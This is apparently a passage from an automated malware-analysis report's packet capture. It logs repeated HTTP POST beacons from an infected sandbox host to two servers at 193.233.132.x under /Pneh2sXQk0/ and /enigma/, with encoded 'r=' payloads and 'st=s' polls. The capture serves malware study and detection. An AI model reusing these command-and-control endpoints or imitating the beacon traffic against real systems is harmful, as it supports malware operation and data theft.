                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1426192.168.2.551281193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:31.339226961 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:31.585488081 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1427192.168.2.551282193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:31.802980900 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.046503067 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1428192.168.2.551283193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:31.911051035 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.153614044 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1429192.168.2.551284193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.292921066 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.540616989 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1430192.168.2.551285193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.405694962 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.654869080 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1431192.168.2.551286193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.883845091 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.125235081 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1432192.168.2.551287193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.980370045 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.228178978 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1433192.168.2.551288193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.383054972 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.638498068 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1434192.168.2.551289193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.479418039 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.727906942 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1435192.168.2.551290193.233.132.167802956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.987055063 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:34.237394094 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1436192.168.2.551291193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:34.053054094 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:34.295047045 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1437192.168.2.551292193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:34.486393929 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:34.734529018 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1438192.168.2.551293193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:34.545939922 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:34.798774004 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1439192.168.2.551294193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:35.085906982 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:35.331721067 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1440192.168.2.551295193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:35.131383896 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:35.376146078 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1441192.168.2.551296193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:35.590260983 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:35.844428062 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1442192.168.2.551297193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:35.619990110 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:35.861323118 CEST196INHTTP/1.1 200 OK
